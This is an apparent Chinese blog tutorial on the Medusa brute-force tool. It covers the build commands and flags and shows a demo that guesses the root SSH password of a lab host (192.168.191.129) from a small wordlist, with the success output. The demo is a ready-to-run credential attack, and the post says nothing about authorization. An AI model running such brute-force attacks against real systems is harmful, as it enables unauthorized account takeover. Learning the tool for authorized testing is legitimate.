深度揭秘暴力破解SSH密码 —— Medusa美杜莎

目录

 

前言

安装配置

模拟使用

总结

 

前言

          Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码破解工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具。

安装配置

1)了解它的一些功能

官网:http://foofus.net/goons/jmk/medusa/medusa.html

2)去官网下载tar包

3)上传包并解压安装

[root@bogon ~]# yum install lrzsz -y
[root@bogon ~]# yum -y install gcc gcc-c++ openssl-devel libssh2-devel postgresql-devel subversion-devel freerdp-devel   #安装苏需要的依赖官网有说明
[root@bogon ~]# cd medusa-2.2
[root@bogon ~]# ./configure   --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes     #加入它的部分模块
[root@bogon ~]# make -j 4
[root@bogon ~]# make install   #安装
[root@bogon ~]# ls /usr/local/lib/medusa/modules    #查看可用的模块

4)美杜莎的参数说明

Medusa [-hhost|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module[OPT]
-h [TEXT]      目标主机名称或者IP地址
-H [FILE]       包含目标主机名称或者IP地址文件
-u [TEXT]      测试的用户名
-U [FILE]       包含测试的用户名文件
-p [TEXT]      测试的密码
-P [FILE]       包含测试的密码文件
-C [FILE]       组合条目文件
-O [FILE]       日志信息文件
-e [n/s/ns]    n代表空密码,s代表为密码与用户名相同
-M [TEXT]      模块执行名称
-m [TEXT]      传递参数到模块
-d                 显示所有的模块名称
-n [NUM]       使用非默认Tcp端口
-s                 启用SSL
-r [NUM]       重试间隔时间,默认为3秒
-t [NUM]       设定线程数量
-T             同时测试的主机总数
-L                 并行化,每个用户使用一个线程
-f                 在任何主机上找到第一个账号/密码后,停止破解
-F                在任何主机上找到第一个有效的用户名/密码后停止审计。
-q                显示模块的使用信息
-v [NUM]      详细级别(0-6)
-w [NUM]     错误调试级别(0-10)
-V                显示版本
-Z [TEXT]      继续扫描上一次

模拟使用

1)创建我们的字典,里面可以存放任何密码

[root@bogon ~]# vi /root/zd.txt
123456789
12345
123456ada
123456
fsfsgs

2)演示(这里我演示单一ip)

[root@bogon ~]# medusa -M ssh -h 192.168.191.129 -u root -P /root/zd.txt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456789 (1 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 12345 (2 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456ada (3 of 5 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.191.129 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (4 of 5 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.191.129 User: root Password: 123456 [SUCCESS]

总结

         可以从我的演示中看出,只要密码库够全,密码被分析出来的几率就会很大,无非就是时间的问题。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

胖胖不胖、

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值